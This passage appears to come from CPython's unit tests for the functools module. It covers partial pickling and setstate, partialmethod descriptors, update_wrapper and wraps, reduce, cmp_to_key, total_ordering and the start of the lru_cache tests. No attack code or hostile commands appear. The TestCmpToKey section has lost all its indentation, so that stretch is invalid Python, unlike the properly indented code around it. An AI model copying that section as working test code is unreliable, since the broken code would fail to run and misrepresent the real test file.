        f.__setstate__((capture, (1,), None, None))
        #self.assertEqual(signature(f), (capture, (1,), {}, {}))
        self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
        self.assertEqual(f(2), ((1, 2), {}))
        self.assertEqual(f(), ((1,), {}))
        f.__setstate__((capture, (), {}, None))
        self.assertEqual(signature(f), (capture, (), {}, {}))
        self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
        self.assertEqual(f(2), ((2,), {}))
        self.assertEqual(f(), ((), {}))

    def test_setstate_errors(self):
        f = self.partial(signature)
        self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
        self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
        self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
        self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
        self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
        self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
        self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))

    def test_setstate_subclasses(self):
        # tuple/dict subclasses in the state are normalized to base types
        f = self.partial(signature)
        f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
        s = signature(f)
        self.assertEqual(s, (capture, (1,), dict(a=10), {}))
        self.assertIs(type(s[1]), tuple)
        self.assertIs(type(s[2]), dict)
        r = f()
        self.assertEqual(r, ((1,), {'a': 10}))
        self.assertIs(type(r[0]), tuple)
        self.assertIs(type(r[1]), dict)
        f.__setstate__((capture, BadTuple((1,)), {}, None))
        s = signature(f)
        self.assertEqual(s, (capture, (1,), {}, {}))
        self.assertIs(type(s[1]), tuple)
        r = f(2)
        self.assertEqual(r, ((1, 2), {}))
        self.assertIs(type(r[0]), tuple)

    def test_recursive_pickle(self):
        with self.AllowPickle():
            f = self.partial(capture)
            f.__setstate__((f, (), {}, {}))
            try:
                for proto in range(pickle.HIGHEST_PROTOCOL + 1):
                    with self.assertRaises(RecursionError):
                        pickle.dumps(f, proto)
            finally:
                f.__setstate__((capture, (), {}, {}))
            f = self.partial(capture)
            f.__setstate__((capture, (f,), {}, {}))
            try:
                for proto in range(pickle.HIGHEST_PROTOCOL + 1):
                    f_copy = pickle.loads(pickle.dumps(f, proto))
                    try:
                        self.assertIs(f_copy.args[0], f_copy)
                    finally:
                        f_copy.__setstate__((capture, (), {}, {}))
            finally:
                f.__setstate__((capture, (), {}, {}))
            f = self.partial(capture)
            f.__setstate__((capture, (), {'a': f}, {}))
            try:
                for proto in range(pickle.HIGHEST_PROTOCOL + 1):
                    f_copy = pickle.loads(pickle.dumps(f, proto))
                    try:
                        self.assertIs(f_copy.keywords['a'], f_copy)
                    finally:
                        f_copy.__setstate__((capture, (), {}, {}))
            finally:
                f.__setstate__((capture, (), {}, {}))

    # Issue 6083: Reference counting bug
    def test_setstate_refcount(self):
        class BadSequence:
            def __len__(self):
                return 4
            def __getitem__(self, key):
                if key == 0:
                    return max
                elif key == 1:
                    return tuple(range(1000000))
                elif key in (2, 3):
                    return {}
                raise IndexError
        f = self.partial(object)
        self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
    """Runs the shared partial tests against the C implementation, plus
    C-implementation-specific checks (read-only attributes, repr safety)."""
    if c_functools:
        partial = c_functools.partial

    class AllowPickle:
        # The C partial pickles without module swapping; no-op manager.
        def __enter__(self):
            return self
        def __exit__(self, type, value, tb):
            return False

    def test_attributes_unwritable(self):
        # attributes should not be writable
        p = self.partial(capture, 1, 2, a=10, b=20)
        self.assertRaises(AttributeError, setattr, p, 'func', map)
        self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
        self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))

        p = self.partial(hex)
        try:
            del p.__dict__
        except TypeError:
            pass
        else:
            self.fail('partial object allowed __dict__ to be deleted')

    def test_manually_adding_non_string_keyword(self):
        p = self.partial(capture)
        # Adding a non-string/unicode keyword to partial kwargs
        p.keywords[1234] = 'value'
        r = repr(p)
        self.assertIn('1234', r)
        self.assertIn("'value'", r)
        with self.assertRaises(TypeError):
            p()

    def test_keystr_replaces_value(self):
        p = self.partial(capture)

        class MutatesYourDict(object):
            def __str__(self):
                p.keywords[self] = ['sth2']
                return 'astr'

        # Replacing the value during key formatting should keep the original
        # value alive (at least long enough).
        p.keywords[MutatesYourDict()] = ['sth']
        r = repr(p)
        self.assertIn('astr', r)
        self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
    """Runs the shared partial tests against the pure-Python
    implementation."""
    partial = py_functools.partial

    class AllowPickle:
        # Pickling resolves 'functools.partial' by module name, so swap in
        # the pure-Python functools for the duration of the test.
        def __init__(self):
            self._cm = replaced_module("functools", py_functools)
        def __enter__(self):
            return self._cm.__enter__()
        def __exit__(self, type, value, tb):
            return self._cm.__exit__(type, value, tb)
# Minimal subclasses of each partial implementation, used by the
# *Subclass test cases below to check subclass-specific behavior.
if c_functools:
    class CPartialSubclass(c_functools.partial):
        pass

class PyPartialSubclass(py_functools.partial):
    pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
    """Re-runs the C partial tests on a subclass of c_functools.partial."""
    if c_functools:
        partial = CPartialSubclass

    # partial subclasses are not optimized for nested calls
    test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
    """Re-runs the pure-Python partial tests on a subclass of
    py_functools.partial."""
    partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
    """Tests for functools.partialmethod: argument binding, descriptor
    behavior (bound/unbound, static/class methods), nesting, and repr."""

    class A(object):
        # One partialmethod per binding style under test.
        nothing = functools.partialmethod(capture)
        positional = functools.partialmethod(capture, 1)
        keywords = functools.partialmethod(capture, a=2)
        both = functools.partialmethod(capture, 3, b=4)

        nested = functools.partialmethod(positional, 5)

        over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)

        static = functools.partialmethod(staticmethod(capture), 8)
        cls = functools.partialmethod(classmethod(capture), d=9)

    a = A()

    def test_arg_combinations(self):
        self.assertEqual(self.a.nothing(), ((self.a,), {}))
        self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
        self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
        self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))

        self.assertEqual(self.a.positional(), ((self.a, 1), {}))
        self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
        self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
        self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))

        self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
        self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
        self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
        self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))

        self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
        self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
        self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
        self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))

        self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))

    def test_nested(self):
        self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
        self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
        self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
        self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))

        self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))

    def test_over_partial(self):
        self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
        self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
        self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
        self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))

        self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))

    def test_bound_method_introspection(self):
        obj = self.a
        self.assertIs(obj.both.__self__, obj)
        self.assertIs(obj.nested.__self__, obj)
        self.assertIs(obj.over_partial.__self__, obj)
        self.assertIs(obj.cls.__self__, self.A)
        self.assertIs(self.A.cls.__self__, self.A)

    def test_unbound_method_retrieval(self):
        obj = self.A
        self.assertFalse(hasattr(obj.both, "__self__"))
        self.assertFalse(hasattr(obj.nested, "__self__"))
        self.assertFalse(hasattr(obj.over_partial, "__self__"))
        self.assertFalse(hasattr(obj.static, "__self__"))
        self.assertFalse(hasattr(self.a.static, "__self__"))

    def test_descriptors(self):
        for obj in [self.A, self.a]:
            with self.subTest(obj=obj):
                self.assertEqual(obj.static(), ((8,), {}))
                self.assertEqual(obj.static(5), ((8, 5), {}))
                self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
                self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))

                self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
                self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
                self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
                self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))

    def test_overriding_keywords(self):
        self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
        self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))

    def test_invalid_args(self):
        with self.assertRaises(TypeError):
            class B(object):
                method = functools.partialmethod(None, 1)

    def test_repr(self):
        self.assertEqual(repr(vars(self.A)['both']),
                         'functools.partialmethod({}, 3, b=4)'.format(capture))

    def test_abstract(self):
        # NOTE(review): Abstract inherits from abc.ABCMeta (a metaclass) --
        # looks intentional-quirky for this test; confirm before "fixing".
        class Abstract(abc.ABCMeta):

            @abc.abstractmethod
            def add(self, x, y):
                pass

            add5 = functools.partialmethod(add, 5)

        self.assertTrue(Abstract.add.__isabstractmethod__)
        self.assertTrue(Abstract.add5.__isabstractmethod__)

        for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
            self.assertFalse(getattr(func, '__isabstractmethod__', False))
class TestUpdateWrapper(unittest.TestCase):
    """Tests for functools.update_wrapper()."""

    def check_wrapper(self, wrapper, wrapped,
                      assigned=functools.WRAPPER_ASSIGNMENTS,
                      updated=functools.WRAPPER_UPDATES):
        """Assert that *wrapper* mirrors *wrapped* for the given
        assigned/updated attribute sets and records __wrapped__."""
        # Check attributes were assigned
        for name in assigned:
            self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
        # Check attributes were updated
        for name in updated:
            wrapper_attr = getattr(wrapper, name)
            wrapped_attr = getattr(wrapped, name)
            for key in wrapped_attr:
                if name == "__dict__" and key == "__wrapped__":
                    # __wrapped__ is overwritten by the update code
                    continue
                self.assertIs(wrapped_attr[key], wrapper_attr[key])
        # Check __wrapped__
        self.assertIs(wrapper.__wrapped__, wrapped)

    def _default_update(self):
        """Build a (wrapper, wrapped) pair updated with the defaults.
        The bogus __wrapped__ on f must be replaced by update_wrapper."""
        def f(a:'This is a new annotation'):
            """This is a test"""
            pass
        f.attr = 'This is also a test'
        f.__wrapped__ = "This is a bald faced lie"
        def wrapper(b:'This is the prior annotation'):
            pass
        functools.update_wrapper(wrapper, f)
        return wrapper, f

    def test_default_update(self):
        # Default behavior: metadata, __dict__ contents, and annotations
        # are all copied from the wrapped function.
        wrapper, f = self._default_update()
        self.check_wrapper(wrapper, f)
        self.assertIs(wrapper.__wrapped__, f)
        self.assertEqual(wrapper.__name__, 'f')
        self.assertEqual(wrapper.__qualname__, f.__qualname__)
        self.assertEqual(wrapper.attr, 'This is also a test')
        self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
        # The wrapper's own prior annotation must have been replaced.
        self.assertNotIn('b', wrapper.__annotations__)

    @unittest.skipIf(sys.flags.optimize >= 2,
                     "Docstrings are omitted with -O2 and above")
    def test_default_update_doc(self):
        wrapper, f = self._default_update()
        self.assertEqual(wrapper.__doc__, 'This is a test')

    def test_no_update(self):
        # Empty assigned/updated tuples: nothing is copied over.
        def f():
            """This is a test"""
            pass
        f.attr = 'This is also a test'
        def wrapper():
            pass
        functools.update_wrapper(wrapper, f, (), ())
        self.check_wrapper(wrapper, f, (), ())
        self.assertEqual(wrapper.__name__, 'wrapper')
        self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
        self.assertEqual(wrapper.__doc__, None)
        self.assertEqual(wrapper.__annotations__, {})
        self.assertFalse(hasattr(wrapper, 'attr'))

    def test_selective_update(self):
        # Custom assigned/updated tuples: only the named attributes move.
        def f():
            pass
        f.attr = 'This is a different test'
        f.dict_attr = dict(a=1, b=2, c=3)
        def wrapper():
            pass
        wrapper.dict_attr = {}
        assign = ('attr',)
        update = ('dict_attr',)
        functools.update_wrapper(wrapper, f, assign, update)
        self.check_wrapper(wrapper, f, assign, update)
        self.assertEqual(wrapper.__name__, 'wrapper')
        self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
        self.assertEqual(wrapper.__doc__, None)
        self.assertEqual(wrapper.attr, 'This is a different test')
        self.assertEqual(wrapper.dict_attr, f.dict_attr)

    def test_missing_attributes(self):
        def f():
            pass
        def wrapper():
            pass
        wrapper.dict_attr = {}
        assign = ('attr',)
        update = ('dict_attr',)
        # Missing attributes on wrapped object are ignored
        functools.update_wrapper(wrapper, f, assign, update)
        self.assertNotIn('attr', wrapper.__dict__)
        self.assertEqual(wrapper.dict_attr, {})
        # Wrapper must have expected attributes for updating
        del wrapper.dict_attr
        with self.assertRaises(AttributeError):
            functools.update_wrapper(wrapper, f, assign, update)
        wrapper.dict_attr = 1
        with self.assertRaises(AttributeError):
            functools.update_wrapper(wrapper, f, assign, update)

    @support.requires_docstrings
    @unittest.skipIf(sys.flags.optimize >= 2,
                     "Docstrings are omitted with -O2 and above")
    def test_builtin_update(self):
        # Test for bug #1576241: builtins have no __dict__, which used to
        # break update_wrapper.
        def wrapper():
            pass
        functools.update_wrapper(wrapper, max)
        self.assertEqual(wrapper.__name__, 'max')
        self.assertTrue(wrapper.__doc__.startswith('max('))
        self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
    """Tests for the functools.wraps() decorator.

    Inherits TestUpdateWrapper's checks and overrides the fixtures to go
    through @wraps instead of calling update_wrapper directly.
    """

    def _default_update(self):
        def f():
            """This is a test"""
            pass
        f.attr = 'This is also a test'
        f.__wrapped__ = "This is still a bald faced lie"
        @functools.wraps(f)
        def wrapper():
            pass
        return wrapper, f

    def test_default_update(self):
        wrapper, f = self._default_update()
        self.check_wrapper(wrapper, f)
        self.assertEqual(wrapper.__name__, 'f')
        self.assertEqual(wrapper.__qualname__, f.__qualname__)
        self.assertEqual(wrapper.attr, 'This is also a test')

    @unittest.skipIf(sys.flags.optimize >= 2,
                     "Docstrings are omitted with -O2 and above")
    def test_default_update_doc(self):
        wrapper, _ = self._default_update()
        self.assertEqual(wrapper.__doc__, 'This is a test')

    def test_no_update(self):
        # wraps() with empty assigned/updated tuples copies nothing.
        def f():
            """This is a test"""
            pass
        f.attr = 'This is also a test'
        @functools.wraps(f, (), ())
        def wrapper():
            pass
        self.check_wrapper(wrapper, f, (), ())
        self.assertEqual(wrapper.__name__, 'wrapper')
        self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
        self.assertEqual(wrapper.__doc__, None)
        self.assertFalse(hasattr(wrapper, 'attr'))

    def test_selective_update(self):
        # Only the explicitly-named attributes are assigned/updated.
        def f():
            pass
        f.attr = 'This is a different test'
        f.dict_attr = dict(a=1, b=2, c=3)
        def add_dict_attr(f):
            f.dict_attr = {}
            return f
        assign = ('attr',)
        update = ('dict_attr',)
        @functools.wraps(f, assign, update)
        @add_dict_attr
        def wrapper():
            pass
        self.check_wrapper(wrapper, f, assign, update)
        self.assertEqual(wrapper.__name__, 'wrapper')
        self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
        self.assertEqual(wrapper.__doc__, None)
        self.assertEqual(wrapper.attr, 'This is a different test')
        self.assertEqual(wrapper.dict_attr, f.dict_attr)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduce(unittest.TestCase):
    """Tests for functools.reduce (only provided by the C _functools)."""
    if c_functools:
        func = c_functools.reduce

    def test_reduce(self):
        # Lazily-materialized sequence of squares, indexable up to max.
        class Squares:
            def __init__(self, max):
                self.max = max
                self.sofar = []

            def __len__(self):
                return len(self.sofar)

            def __getitem__(self, i):
                if not 0 <= i < self.max: raise IndexError
                n = len(self.sofar)
                while n <= i:
                    self.sofar.append(n*n)
                    n += 1
                return self.sofar[i]

        def add(x, y):
            return x + y

        self.assertEqual(self.func(add, ['a', 'b', 'c'], ''), 'abc')
        self.assertEqual(
            self.func(add, [['a', 'c'], [], ['d', 'w']], []),
            ['a','c','d','w']
        )
        self.assertEqual(self.func(lambda x, y: x*y, range(2,8), 1), 5040)
        self.assertEqual(
            self.func(lambda x, y: x*y, range(2,21), 1),
            2432902008176640000
        )
        # sum of squares 0..9 is 285
        self.assertEqual(self.func(add, Squares(10)), 285)
        self.assertEqual(self.func(add, Squares(10), 0), 285)
        self.assertEqual(self.func(add, Squares(0), 0), 0)
        self.assertRaises(TypeError, self.func)
        self.assertRaises(TypeError, self.func, 42, 42)
        self.assertRaises(TypeError, self.func, 42, 42, 42)
        self.assertEqual(self.func(42, "1"), "1") # func is never called with one item
        self.assertEqual(self.func(42, "", "1"), "1") # func is never called with one item
        self.assertRaises(TypeError, self.func, 42, (42, 42))
        self.assertRaises(TypeError, self.func, add, []) # arg 2 must not be empty sequence with no initial value
        self.assertRaises(TypeError, self.func, add, "")
        self.assertRaises(TypeError, self.func, add, ())
        self.assertRaises(TypeError, self.func, add, object())

        # An iterable whose __iter__ raises must propagate the error.
        class TestFailingIter:
            def __iter__(self):
                raise RuntimeError
        self.assertRaises(RuntimeError, self.func, add, TestFailingIter())

        # Empty iterable with an explicit initial value returns it as-is.
        self.assertEqual(self.func(add, [], None), None)
        self.assertEqual(self.func(add, [], 42), 42)

        class BadSeq:
            def __getitem__(self, index):
                raise ValueError
        self.assertRaises(ValueError, self.func, 42, BadSeq())

    # Test reduce()'s use of iterators.
    def test_iterator_usage(self):
        class SequenceClass:
            def __init__(self, n):
                self.n = n
            def __getitem__(self, i):
                if 0 <= i < self.n:
                    return i
                else:
                    raise IndexError

        from operator import add
        self.assertEqual(self.func(add, SequenceClass(5)), 10)
        self.assertEqual(self.func(add, SequenceClass(5), 42), 52)
        # Empty sequence and no initial value is a TypeError.
        self.assertRaises(TypeError, self.func, add, SequenceClass(0))
        self.assertEqual(self.func(add, SequenceClass(0), 42), 42)
        self.assertEqual(self.func(add, SequenceClass(1)), 0)
        self.assertEqual(self.func(add, SequenceClass(1), 42), 42)

        # Dicts iterate their keys; relies on insertion-ordered dicts.
        d = {"one": 1, "two": 2, "three": 3}
        self.assertEqual(self.func(add, d), "".join(d.keys()))
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.abc.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
    """Run the shared cmp_to_key tests against the C implementation."""
    if c_functools:
        cmp_to_key = c_functools.cmp_to_key
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
    """Run the shared cmp_to_key tests against the pure-Python version."""
    # staticmethod() keeps the function from being bound as a method.
    cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
    """Tests for the functools.total_ordering class decorator."""

    def test_total_ordering_lt(self):
        # __eq__ plus __lt__ is enough; the decorator derives >, <=, >=.
        @functools.total_ordering
        class A:
            def __init__(self, value):
                self.value = value
            def __lt__(self, other):
                return self.value < other.value
            def __eq__(self, other):
                return self.value == other.value
        self.assertTrue(A(1) < A(2))
        self.assertTrue(A(2) > A(1))
        self.assertTrue(A(1) <= A(2))
        self.assertTrue(A(2) >= A(1))
        self.assertTrue(A(2) <= A(2))
        self.assertTrue(A(2) >= A(2))
        self.assertFalse(A(1) > A(2))

    def test_total_ordering_le(self):
        # __eq__ plus __le__ is enough.
        @functools.total_ordering
        class A:
            def __init__(self, value):
                self.value = value
            def __le__(self, other):
                return self.value <= other.value
            def __eq__(self, other):
                return self.value == other.value
        self.assertTrue(A(1) < A(2))
        self.assertTrue(A(2) > A(1))
        self.assertTrue(A(1) <= A(2))
        self.assertTrue(A(2) >= A(1))
        self.assertTrue(A(2) <= A(2))
        self.assertTrue(A(2) >= A(2))
        self.assertFalse(A(1) >= A(2))

    def test_total_ordering_gt(self):
        # __eq__ plus __gt__ is enough.
        @functools.total_ordering
        class A:
            def __init__(self, value):
                self.value = value
            def __gt__(self, other):
                return self.value > other.value
            def __eq__(self, other):
                return self.value == other.value
        self.assertTrue(A(1) < A(2))
        self.assertTrue(A(2) > A(1))
        self.assertTrue(A(1) <= A(2))
        self.assertTrue(A(2) >= A(1))
        self.assertTrue(A(2) <= A(2))
        self.assertTrue(A(2) >= A(2))
        self.assertFalse(A(2) < A(1))

    def test_total_ordering_ge(self):
        # __eq__ plus __ge__ is enough.
        @functools.total_ordering
        class A:
            def __init__(self, value):
                self.value = value
            def __ge__(self, other):
                return self.value >= other.value
            def __eq__(self, other):
                return self.value == other.value
        self.assertTrue(A(1) < A(2))
        self.assertTrue(A(2) > A(1))
        self.assertTrue(A(1) <= A(2))
        self.assertTrue(A(2) >= A(1))
        self.assertTrue(A(2) <= A(2))
        self.assertTrue(A(2) >= A(2))
        self.assertFalse(A(2) <= A(1))

    def test_total_ordering_no_overwrite(self):
        # new methods should not overwrite existing
        @functools.total_ordering
        class A(int):
            pass
        self.assertTrue(A(1) < A(2))
        self.assertTrue(A(2) > A(1))
        self.assertTrue(A(1) <= A(2))
        self.assertTrue(A(2) >= A(1))
        self.assertTrue(A(2) <= A(2))
        self.assertTrue(A(2) >= A(2))

    def test_no_operations_defined(self):
        # Decorating a class with no ordering operation at all is an error.
        with self.assertRaises(ValueError):
            @functools.total_ordering
            class A:
                pass

    def test_type_error_when_not_implemented(self):
        # bug 10042; ensure stack overflow does not occur
        # when decorated types return NotImplemented
        @functools.total_ordering
        class ImplementsLessThan:
            def __init__(self, value):
                self.value = value
            def __eq__(self, other):
                if isinstance(other, ImplementsLessThan):
                    return self.value == other.value
                return False
            def __lt__(self, other):
                if isinstance(other, ImplementsLessThan):
                    return self.value < other.value
                return NotImplemented

        @functools.total_ordering
        class ImplementsGreaterThan:
            def __init__(self, value):
                self.value = value
            def __eq__(self, other):
                if isinstance(other, ImplementsGreaterThan):
                    return self.value == other.value
                return False
            def __gt__(self, other):
                if isinstance(other, ImplementsGreaterThan):
                    return self.value > other.value
                return NotImplemented

        @functools.total_ordering
        class ImplementsLessThanEqualTo:
            def __init__(self, value):
                self.value = value
            def __eq__(self, other):
                if isinstance(other, ImplementsLessThanEqualTo):
                    return self.value == other.value
                return False
            def __le__(self, other):
                if isinstance(other, ImplementsLessThanEqualTo):
                    return self.value <= other.value
                return NotImplemented

        @functools.total_ordering
        class ImplementsGreaterThanEqualTo:
            def __init__(self, value):
                self.value = value
            def __eq__(self, other):
                if isinstance(other, ImplementsGreaterThanEqualTo):
                    return self.value == other.value
                return False
            def __ge__(self, other):
                if isinstance(other, ImplementsGreaterThanEqualTo):
                    return self.value >= other.value
                return NotImplemented

        @functools.total_ordering
        class ComparatorNotImplemented:
            def __init__(self, value):
                self.value = value
            def __eq__(self, other):
                if isinstance(other, ComparatorNotImplemented):
                    return self.value == other.value
                return False
            def __lt__(self, other):
                return NotImplemented

        # Cross-type comparisons must end in TypeError, not recursion.
        with self.subTest("LT < 1"), self.assertRaises(TypeError):
            ImplementsLessThan(-1) < 1
        with self.subTest("LT < LE"), self.assertRaises(TypeError):
            ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
        with self.subTest("LT < GT"), self.assertRaises(TypeError):
            ImplementsLessThan(1) < ImplementsGreaterThan(1)
        with self.subTest("LE <= LT"), self.assertRaises(TypeError):
            ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
        with self.subTest("LE <= GE"), self.assertRaises(TypeError):
            ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
        with self.subTest("GT > GE"), self.assertRaises(TypeError):
            ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
        with self.subTest("GT > LT"), self.assertRaises(TypeError):
            ImplementsGreaterThan(5) > ImplementsLessThan(5)
        with self.subTest("GE >= GT"), self.assertRaises(TypeError):
            ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
        with self.subTest("GE >= LE"), self.assertRaises(TypeError):
            ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
        # Even when objects compare equal, derived operators must raise if
        # the root comparison returns NotImplemented.
        with self.subTest("GE when equal"):
            a = ComparatorNotImplemented(8)
            b = ComparatorNotImplemented(8)
            self.assertEqual(a, b)
            with self.assertRaises(TypeError):
                a >= b
        with self.subTest("LE when equal"):
            a = ComparatorNotImplemented(9)
            b = ComparatorNotImplemented(9)
            self.assertEqual(a, b)
            with self.assertRaises(TypeError):
                a <= b

    def test_pickle(self):
        # Derived comparison methods must be picklable (they round-trip by
        # reference to the module-level Orderable_LT class).
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            for name in '__lt__', '__gt__', '__le__', '__ge__':
                with self.subTest(method=name, proto=proto):
                    method = getattr(Orderable_LT, name)
                    method_copy = pickle.loads(pickle.dumps(method, proto))
                    self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
    """Module-level ordering fixture for the pickle test.

    Defines only __eq__ and __lt__; total_ordering derives the remaining
    comparison methods, which TestTotalOrdering.test_pickle round-trips.
    """

    def __init__(self, value):
        self.value = value

    def __eq__(self, other):
        return self.value == other.value

    def __lt__(self, other):
        return self.value < other.value
class TestLRU:
    """Shared tests for lru_cache.

    This is a mixin: subclasses (TestLRUPy / TestLRUC) supply ``module``
    (the pure-Python or C-accelerated functools) plus the module-level
    cached_func / cached_meth / cached_staticmeth fixtures, and mix in
    unittest.TestCase.
    """

    def test_lru(self):
        def orig(x, y):
            return 3 * x + y
        f = self.module.lru_cache(maxsize=20)(orig)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(maxsize, 20)
        self.assertEqual(currsize, 0)
        self.assertEqual(hits, 0)
        self.assertEqual(misses, 0)

        # Only 25 distinct (x, y) pairs exist, so the 20-slot cache fills
        # and most of the 1000 random calls are hits.
        domain = range(5)
        for i in range(1000):
            x, y = choice(domain), choice(domain)
            actual = f(x, y)
            expected = orig(x, y)
            self.assertEqual(actual, expected)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertTrue(hits > misses)
        self.assertEqual(hits + misses, 1000)
        self.assertEqual(currsize, 20)

        f.cache_clear()   # test clearing
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(hits, 0)
        self.assertEqual(misses, 0)
        self.assertEqual(currsize, 0)
        f(x, y)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(hits, 0)
        self.assertEqual(misses, 1)
        self.assertEqual(currsize, 1)

